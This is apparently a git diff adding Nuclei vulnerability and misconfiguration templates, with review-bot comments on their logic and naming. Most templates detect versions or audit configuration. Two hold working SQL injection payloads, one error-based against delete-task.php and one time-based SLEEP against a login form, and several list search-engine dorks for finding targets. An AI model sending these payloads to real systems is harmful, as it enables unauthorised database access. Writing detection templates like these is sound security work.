diff --git a/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml b/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml new file mode 100644 index 0000000000..4bed1d573a --- /dev/null +++ b/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9505 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-9505' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml b/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml new file mode 100644 index 0000000000..6fe9238730 --- /dev/null +++ b/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e + +info: + name: > + Contact Form 7 + Telegram <= 0.8.5 - Missing Authorization to Authenticated (Subscriber+) Subscription Approve/Pause/Refuse + author: topscoder + severity: low + description: > + The Contact Form 7 + Telegram plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wpcf7_Telegram::ajax' function in versions up to, and including, 0.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to approve, pause and refuse subscriptions. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-9629 + metadata: + fofa-query: "wp-content/plugins/cf7-telegram/" + google-query: inurl:"/wp-content/plugins/cf7-telegram/" + shodan-query: 'vuln:CVE-2024-9629' + tags: cve,wordpress,wp-plugin,cf7-telegram,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-telegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-telegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml b/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml new file mode 100644 index 0000000000..f5d1ff358a --- /dev/null +++ b/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352 + +info: + name: > + WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check + author: topscoder + severity: critical + description: > + The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.10.1. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/50349086-e7b0-4f73-8722-1367cc05180e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9933 + metadata: + fofa-query: "wp-content/plugins/watchtowerhq/" + google-query: inurl:"/wp-content/plugins/watchtowerhq/" + shodan-query: 'vuln:CVE-2024-9933' + tags: cve,wordpress,wp-plugin,watchtowerhq,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/watchtowerhq/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "watchtowerhq" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.10.1') \ No newline at end of file 
diff --git "a/poc/cve/CVE-2024\342\200\22324142.yaml" "b/poc/cve/CVE-2024\342\200\22324142.yaml"
new file mode 100644
index 0000000000..3fec068fb3
--- /dev/null
+++ "b/poc/cve/CVE-2024\342\200\22324142.yaml"
@@ -0,0 +1,26 @@
+id: sql-injection-detection
+
+info:
+ name: SQL Injection Detection
+ author: hellonotworld99, yjeongc, HohoHoui, shinyeji-spea
+ severity: high
+ description: This template checks for SQL injection vulnerability in the 'task' parameter of the delete-task.php endpoint by looking for a specific database name in error messages.
+ reference:
+ - https://sqlmap.org/
+ - https://github.com/BurakSevben/CVE-2024-24142?tab=readme-ov-file
+ tags: sql,injection
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/school-task-manager/endpoint/delete-task.php?task=5' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT DATABASE()), 0x5c))--'"
+ matchers-condition: or
+ matchers:
+ - type: regex
+ name: database-name-error
+ regex:
+ - "school_task_manager_db"
+ part: body
+ condition: and
+
+
diff --git a/poc/cve/cve-2024-6966.yaml b/poc/cve/cve-2024-6966.yaml
new file mode 100644
index 0000000000..def1ee9365
--- /dev/null
+++ b/poc/cve/cve-2024-6966.yaml
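Review bot: The new file is named `CVE-2024\342\200\22324142.yaml`, i.e. the separator between `2024` and `24142` is U+2013 (en dash) rather than `-`, which breaks tooling that maps filenames to CVE ids and makes the file awkward to address from a shell; rename it to `CVE-2024-24142.yaml`. Inside, `id: sql-injection-detection` and `tags: sql,injection` are generic, so the CVE is not discoverable by id or tag: use `id: CVE-2024-24142`, add a `classification` block with `cve-id: CVE-2024-24142`, and tag `cve,cve2024,sqli`. `requests:` is the legacy key where the siblings use `http:`, `matchers-condition: or` with a single matcher and `condition: and` on a one-entry regex are both no-ops, and `severity: high` has no CVSS score behind it.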
@@ -0,0 +1,42 @@
+id: cve-2024-6966
+
+info:
+ name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
+ author: cl4irv0yance
+ description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.
+ severity: High
+ reference:
+ - https://github.com/HermesCui/CVE/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: cve-2024-6966
+ tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode
+
+
+http:
+ - raw:
+ - |
+ @timeout: 25s
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Username'
+ - 'Password'
+ - 'Keep me Signed in'
+ - 'Forgot Password'
+ - 'Wrong email or password'
+ condition: and
+
+ - type: dsl
+ dsl:
+ - 'duration>=10'
diff --git a/poc/default/change-default-port.yaml b/poc/default/change-default-port.yaml
new file mode 100644
index 0000000000..43129ce8c0
--- /dev/null
+++ b/poc/default/change-default-port.yaml
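Review bot: `severity: High`, `cve-id: cve-2024-6966`, `id: cve-2024-6966` and the tag `cve-2024` do not follow the casing and format used by every other CVE template in this commit (`severity: high`, `cve-id: CVE-2024-6966`, tag `cve2024`), which matters for tag filtering and for tooling that keys on the upper-case CVE id. The `user` field in the request body appears to hold a URL-encoded copy of an entire form (`tab%3Don%26user%3D...%26pass%3D...%26sub%3DLog+In`) rather than a single field value, which looks like a paste from a proxy capture; confirm against the referenced issue that this is the intended request. A `metadata` block with `max-request: 1` is also missing.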
@@ -0,0 +1,23 @@
+id: change-default-port
+
+info:
+ name: Change SSH Default Port
+ author: pussycat0x
+ severity: info
+ description: |
+ Reduces Automated Attacks: Changing the default port can help avoid most automated attacks that target port 22.
+ remediation: |
+ Ensure the following line is present: : Port 2222
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://gcore.com/learning/how-to-change-ssh-port/
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "#Port 22"
\ No newline at end of file
diff --git a/poc/default/k8s-default-namespace-used.yaml b/poc/default/k8s-default-namespace-used.yaml
new file mode 100644
index 0000000000..0b43dc37db
--- /dev/null
+++ b/poc/default/k8s-default-namespace-used.yaml
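Review bot: The word matcher `"#Port 22"` only fires on the commented-out default line and misses an explicit `Port 22`, while the obvious fix of matching `Port 22` as a substring would also hit `Port 2222`, the very value the remediation recommends. A regex matcher, `- type: regex` / `regex:` / `- '(?m)^\s*#?\s*Port\s+22\s*$'`, covers both the commented default and an explicit `Port 22` without that false positive. `extensions: - all` means every file nuclei is pointed at is searched, not just `sshd_config`, so any unrelated file containing `#Port 22` becomes a finding. The remediation text also has a doubled colon (`present: : Port 2222`) and prescribes one specific port where any non-default value satisfies the check.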
@@ -0,0 +1,49 @@ +id: k8s-default-namespace-used + +info: + name: Default Namespace Usage in Deployments + author: princechaddha + severity: high + description: Checks if Kubernetes Deployments are using the default namespace, which can lead to security risks and mismanagement issues. + impact: | + Using the default namespace for Kubernetes Deployments can increase security risks as it might allow broader access than necessary. It also complicates resource management across multiple teams and applications. + remediation: | + Avoid using the default namespace for Kubernetes Deployments. Create and specify dedicated namespaces tailored to specific applications or teams to enhance security and manage resources effectively. + reference: + - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,namespaces,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.metadata.namespace.toLowerCase() === "default") { + let result = (`Deployment '${deployment.metadata.name}' is using the default namespace, which is not recommended.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100cb1a8cc055b7e8807ef5dad291c1259028e3d518155d9340c1fe72cb8a6cfad902201644f419892fe61eeb0bccd7e89bf5e57e87cdfb23374f91551df421236c4585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/cyberpanel-detect.yaml b/poc/detect/cyberpanel-detect.yaml new file mode 100644 index 0000000000..79b35965e2 --- /dev/null +++ b/poc/detect/cyberpanel-detect.yaml 
@@ -0,0 +1,35 @@ +id: cyberpanel-detect + +info: + name: Cyberpanel Login Panel - Detect + author: mailler + severity: info + description: Cyberpanel login panel was detected. + reference: + - https://cyberpanel.net/KnowledgeBase/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: cyberpanel + fofa-query: app="Cyberpanel" + product: Cyberpanel + tags: cyberpanel,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - " Login - CyberPanel " + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/docker-ports-detection.yaml b/poc/detect/docker-ports-detection.yaml new file mode 100644 index 0000000000..83cd30db80 --- /dev/null +++ b/poc/detect/docker-ports-detection.yaml @@ -0,0 +1,19 @@ +id: docker-ports-detection +info: + name: Docker Ports Detection + author: drewvravick + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}:2375/version" + - "{{BaseURL}}:2376/version" + + matchers: + - type: word + words: + - "ApiVersion" + - "Docker" + condition: and + part: body diff --git a/poc/detect/flexmls-detect.yaml b/poc/detect/flexmls-detect.yaml new file mode 100644 index 0000000000..aaf6674611 --- /dev/null +++ b/poc/detect/flexmls-detect.yaml 
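Review bot: `{{BaseURL}}:2375/version` appends a port to whatever the input URL already is, so an input such as `http://host:8080` becomes `http://host:8080:2375/version` and the request never reaches the daemon; nuclei's `{{Scheme}}://{{Host}}:2375/version` (and `:2376`) form targets the host regardless of the input's port. This file is added twice with the same blob (`83cd30db80`, here and as `poc/docker/docker-ports-detection.yaml` further down), and the same duplication happens for `http-matcher-extractor-dy-extractor.yaml` (`eb26d50bf7`, `poc/extract` and `poc/http`) and `nodejs-framework-exceptions.yaml` (`09ab0b67bb`, `poc/javascript` and `poc/nodejs`); as far as I recall nuclei warns on duplicate template ids and keeps only one, so the second copies are dead weight. The template also lacks a `description`; a positive match on 2375 is an unauthenticated Docker Engine API reachable from the network, which is worth stating so the `info` severity is read as "detect" rather than "harmless".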
@@ -0,0 +1,47 @@ +id: flexmls-idx-detect + +info: + name: Flexmls IDX - Detect + author: rxerium,sorrowx3 + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: html:"/wp-content/plugins/flexmls-idx" + tags: tech,detect,flexmls,idx + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/flexmls-idx.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' \ No newline at end of file diff --git a/poc/detect/kaseya-detect.yaml b/poc/detect/kaseya-detect.yaml new file mode 100644 index 0000000000..742e14302f --- /dev/null +++ b/poc/detect/kaseya-detect.yaml @@ -0,0 +1,27 @@ +id: kaseya-detect + +info: + name: Kaseya Detection + author: rxerium + severity: info + reference: + - https://www.kaseya.com/ + metadata: + max-request: 2 + shodan-query: "http.favicon.hash:-1445519482" + tags: tech,favicon,kaseya,detect + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + name: "Kaseya" + dsl: + - "status_code==200 && (\"-1445519482\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/poc/detect/localai-detect.yaml b/poc/detect/localai-detect.yaml new file mode 100644 index 0000000000..2c3ffbfe50 --- /dev/null +++ b/poc/detect/localai-detect.yaml 
@@ -0,0 +1,32 @@ +id: localai-detect + +info: + name: LocalAI - Detect + author: s4e-io + severity: info + description: | + An instance running LocalAI was detected. + reference: + - https://github.com/mudler/LocalAI + - https://localai.io/ + metadata: + verified: true + max-request: 1 + vendor: mudler + product: localai + fofa-query: "LocalAI API" + shodan-query: http.favicon.hash:-976853304 + tags: localai,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'contains_all(body, "alt=\"LocalAI Logo\"", "LocalAI")' + - 'status_code == 200' + condition: and diff --git a/poc/detect/pghero-detect.yaml b/poc/detect/pghero-detect.yaml new file mode 100644 index 0000000000..e9bfc60105 --- /dev/null +++ b/poc/detect/pghero-detect.yaml @@ -0,0 +1,27 @@ +id: pghero-detect + +info: + name: PgHero - Detect + author: righettod + severity: info + description: | + PgHero products was detected. + reference: + - https://github.com/ankane/pghero + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"PgHero" + tags: tech,pghero,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")' + condition: and diff --git a/poc/docker/docker-ports-detection.yaml b/poc/docker/docker-ports-detection.yaml new file mode 100644 index 0000000000..83cd30db80 --- /dev/null +++ b/poc/docker/docker-ports-detection.yaml @@ -0,0 +1,19 @@ +id: docker-ports-detection +info: + name: Docker Ports Detection + author: drewvravick + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}:2375/version" + - "{{BaseURL}}:2376/version" + + matchers: + - type: word + words: + - "ApiVersion" + - "Docker" + condition: and + part: body 
diff --git a/poc/docker/k8s-containers-share-host-ipc.yaml b/poc/docker/k8s-containers-share-host-ipc.yaml new file mode 100644 index 0000000000..0aa55f62d1 --- /dev/null +++ b/poc/docker/k8s-containers-share-host-ipc.yaml @@ -0,0 +1,48 @@ +id: k8s-containers-share-host-ipc + +info: + name: Containers sharing host IPC namespace + author: princechaddha + severity: critical + description: Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks. + impact: | + Sharing the host's IPC namespace allows containers to access data across all containers on the same host, posing potential security risks. + remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod",pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostIPC) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host IPC namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a004830460221008e39125e4e88cd6fdf4a7a42cb65ed28ad966f3e82c707981a3a9b61eda975ee022100b7740c6607e3cd3abc78a7ce0787b992b3a7c2a1982f98696000b083db97e7f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/docker/k8s-privileged-container.yaml b/poc/docker/k8s-privileged-container.yaml new file mode 100644 index 0000000000..47e9b4cc32 
--- /dev/null
+++ b/poc/docker/k8s-privileged-container.yaml
@@ -0,0 +1,53 @@ +id: k8s-privileged-containers + +info: + name: Privileged Containers Found in Deployments + author: princechaddha + severity: critical + description: Checks for containers running in privileged mode within Kubernetes Deployments, and now also checks for user privileges and privilege escalation settings. + impact: | + Running containers in privileged mode, as the root user, or with privilege escalation enabled can grant them access to host resources and could lead to security breaches if the container is compromised. + remediation: | + Ensure that no container in Kubernetes Deployments runs in privileged mode, as the root user, or with privilege escalation enabled. Modify the security context for each container to set `privileged: false`, `runAsUser` appropriately, and `allowPrivilegeEscalation: false`. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + for (let container of deployment.spec.template.spec.containers) { + let sc = container.securityContext || {}; + if (sc.privileged || sc.runAsUser < 1000 || sc.allowPrivilegeEscalation) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is running container '${container.name}' with insecure settings: Privileged=${sc.privileged}, runAsUser=${sc.runAsUser}, allowPrivilegeEscalation=${sc.allowPrivilegeEscalation}.`); + Export(result); + break; + } + } + + extractors: + - type: dsl + dsl: + - response +# 
digest: 4a0a00473045022100b7c380b0fdf17140426a4a3f480f73ec33789c08b9975e1206a6c1078a2d6b45022012b453c2fe3a6501a2aebafbc2ff35422c301b9d7c8c0973cf666de045e5b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/docker/k8s-root-container-admission.yaml b/poc/docker/k8s-root-container-admission.yaml new file mode 100644 index 0000000000..491dfb0d89 --- /dev/null +++ b/poc/docker/k8s-root-container-admission.yaml 
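Review bot: The condition `sc.runAsUser < 1000` never flags the case the description calls out, a container running as root because nothing is set: when `runAsUser` is absent the comparison is `undefined < 1000`, which is `false`, and a pod-level `spec.template.spec.securityContext.runAsUser` is never consulted at all. Conversely any deliberately non-root system UID below 1000 (e.g. a `999` database user) is reported as insecure, while root itself is simply UID 0. `sc.allowPrivilegeEscalation` is only truthy when set explicitly, but Kubernetes defaults it to true when absent, so the common unset case is missed there too; and the `break` means only the first offending container per Deployment is ever exported. Something like the following keeps the message format but tests the actual root and escalation conditions.
```javascript
deployment = JSON.parse(template.deployment);
let podSc = deployment.spec.template.spec.securityContext || {};
for (let container of deployment.spec.template.spec.containers) {
  let sc = container.securityContext || {};
  let uid = sc.runAsUser !== undefined ? sc.runAsUser : podSc.runAsUser;
  let nonRoot = sc.runAsNonRoot !== undefined ? sc.runAsNonRoot : podSc.runAsNonRoot;
  // UID 0 is root; an unset UID without runAsNonRoot falls back to the image user
  let rootRisk = uid === 0 || (uid === undefined && nonRoot !== true);
  // allowPrivilegeEscalation is true unless explicitly set to false
  if (sc.privileged || rootRisk || sc.allowPrivilegeEscalation !== false) {
    // … unchanged: build result string and Export(result); no break, report every container …
  }
}
```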
@@ -0,0 +1,49 @@ +id: k8s-root-container-admission + +info: + name: Minimize the admission of root containers + author: princechaddha + severity: critical + description: Checks if any Kubernetes Deployments admit containers that run as root, which can pose a significant security risk. + impact: | + Allowing containers to run as root can lead to privilege escalation and unauthorized access to host resources, significantly compromising the security of the cluster. + remediation: | + Configure security contexts for all pods to run containers with a non-root user. Use Pod Security Policies or OPA/Gatekeeper to enforce these configurations. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.spec.template.spec.containers.some(container => container.securityContext && container.securityContext.runAsUser === null)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' permits containers to run as root.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100f14d422cbd57235a92be20140747bc11a4f73ab68bae70297a73e83b90da0e2b02200b47eb6fcdc4533cd22fe335ae241fd43a20d85df6f259b12d6b909cdd59dfbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/appspec-yml-disclosure.yaml b/poc/exposed/appspec-yml-disclosure.yaml index 0366a46dac..1d0ccf1070 100644 
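Review bot: The predicate `container.securityContext && container.securityContext.runAsUser === null` cannot fire on real `kubectl get ... -o json` output: unset fields are omitted rather than emitted as `null`, so `runAsUser` is `undefined`, never `null`, and a container with no `securityContext` at all (the most common root case) is skipped by the `&&` guard. As written the template reports nothing, while its name promises to catch root admission. The check needs to treat a missing UID as root unless `runAsNonRoot: true` is set, consult the pod-level securityContext for inherited values, and flag an explicit UID 0; the same gap exists in `k8s-privileged-container.yaml` above.
```javascript
deployment = JSON.parse(template.deployment);
let podSc = deployment.spec.template.spec.securityContext || {};
let runsAsRoot = deployment.spec.template.spec.containers.some(container => {
  let sc = container.securityContext || {};
  let uid = sc.runAsUser !== undefined ? sc.runAsUser : podSc.runAsUser;
  let nonRoot = sc.runAsNonRoot !== undefined ? sc.runAsNonRoot : podSc.runAsNonRoot;
  // unset UID with no runAsNonRoot guarantee falls back to the image user, usually root
  return uid === 0 || (uid === undefined && nonRoot !== true);
});
if (runsAsRoot) {
  // … unchanged: build result string and Export(result) …
}
```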
--- a/poc/exposed/appspec-yml-disclosure.yaml +++ b/poc/exposed/appspec-yml-disclosure.yaml @@ -1,15 +1,26 @@ id: appspec-yml-disclosure + info: - name: Appspec Yml Disclosure + name: Appspec YML/YAML - Detect author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + description: Appspec YML and YAML files are susceptible to information disclosure. + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: exposure,config -requests: + +http: - method: GET path: - "{{BaseURL}}/appspec.yml" - "{{BaseURL}}/appspec.yaml" + matchers-condition: and matchers: - type: word @@ -19,6 +30,9 @@ requests: - "files:" part: body condition: and + - type: status status: - 200 + +# digest: 4a0a0047304502207a4b0932e4bf9a73ac47c834c7ad8a7afaebc6467f319c5838c3cdbd961ea27f022100f61bb08a799e587699696f96e8e7e3def08d20af7de79c5e24fc939735ed36d4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/extract/http-matcher-extractor-dy-extractor.yaml b/poc/extract/http-matcher-extractor-dy-extractor.yaml new file mode 100644 index 0000000000..eb26d50bf7 --- /dev/null +++ b/poc/extract/http-matcher-extractor-dy-extractor.yaml 
@@ -0,0 +1,36 @@ +id: http-matcher-extractor-dy-extractor +info: + name: HTTP matcher and extractor & dynamic extractor + description: > + Edgecase to test for a combination of matchers , extractors and dynamic extractors + author: pdteam + severity: info + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + - | + GET {{absolutePath}} HTTP/1.1 + + req-condition: true + extractors: + - type: regex + internal: true + part: body_1 + name: absolutePath + regex: + - '<a href="(/domains)">' + group: 1 + - type: regex + internal: false + part: body_2 + name: title + regex: + - '<title[^>]*>([^<]+)' + group: 1 + matchers: + - type: regex + part: body_2 + regex: + - ']*>([^<]+)' \ No newline at end of file diff --git a/poc/ftp/allow-unencrypted-ftp.yaml b/poc/ftp/allow-unencrypted-ftp.yaml new file mode 100644 index 0000000000..c531e849bc --- /dev/null +++ b/poc/ftp/allow-unencrypted-ftp.yaml @@ -0,0 +1,32 @@ +id: allow-unencrypted-ftp + +info: + name: Allow Unencrypted FTP + author: princechaddha + severity: high + description: Verifies if the FTP server allows unencrypted connections, which can expose sensitive data. + impact: | + Allowing unencrypted FTP can expose credentials and data to attackers during transmission. + remediation: | + Configure FTP to require encrypted connections using SSL/TLS. + tags: ftp,windows,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-WebConfiguration -Filter system.ftpServer/security/authentication/basicAuthentication -PSPath IIS:\ -ErrorAction SilentlyContinue + + matchers: + - type: word + words: + - "Deny" \ No newline at end of file diff --git a/poc/ftp/ftp-service-running.yaml b/poc/ftp/ftp-service-running.yaml new file mode 100644 index 0000000000..8e27ef727d --- /dev/null +++ b/poc/ftp/ftp-service-running.yaml 
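Review bot: The final matcher regex reads `']*>([^<]+)'` as rendered, which is not a usable pattern on its own, and the `title` extractor shows the same truncated text; the second copy of this file (`poc/http/http-matcher-extractor-dy-extractor.yaml`, identical blob `eb26d50bf7`) renders the `absolutePath` regex as `''` instead of `'<a href="(/domains)">'`, so two byte-identical files display differently and the loss is most likely the page stripping anything shaped like an HTML tag (`<title[^>`, `<a href=…>`) rather than a defect in the commit. Worth verifying against the repository rather than this view: if the committed regex really were `']*>([^<]+)'` the matcher would never fire, and an empty `absolutePath` regex would leave the second raw request as `GET  HTTP/1.1`.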
